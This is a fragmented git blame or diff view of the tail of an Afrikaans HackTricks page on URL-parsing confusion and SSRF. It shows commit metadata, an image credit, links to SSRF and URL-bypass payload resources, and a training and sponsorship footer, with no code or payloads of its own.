-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								### Ander Verwirring
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								![https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](<../../.gitbook/assets/image (600).png>)
-												GitBook: [#3007] No subject

											
										
										
											2022-02-13 12:30:13 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								beeld van [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)
-												intruder

											
										
										
											2023-09-02 23:48:41 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								## Verwysings
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-09 13:18:39 +00:00
-												a

											
										
										
											2024-02-06 03:10:27 +00:00
+								* [https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25](https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25)
 								* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md)
-												Translated ['generic-methodologies-and-resources/python/bypass-python-sa

											
										
										
											2024-11-12 10:23:26 +00:00
+								* [https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet](https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet)
-												a

											
										
										
											2024-02-06 03:10:27 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								{% hint style="success" %}
-												Translated ['network-services-pentesting/pentesting-web/php-tricks-esp/R

											
										
										
											2024-09-05 18:59:39 +00:00
+								Leer & oefen AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
 								Leer & oefen GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								<summary>Ondersteun HackTricks</summary>
-												arte

											
										
										
											2024-01-01 17:15:42 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)!
 								* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
-												Translated ['generic-methodologies-and-resources/python/bypass-python-sa

											
										
										
											2024-11-12 10:23:26 +00:00
+								* **Deel hackingtricks deur PR's in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:15:11 +00:00
+								{% endhint %}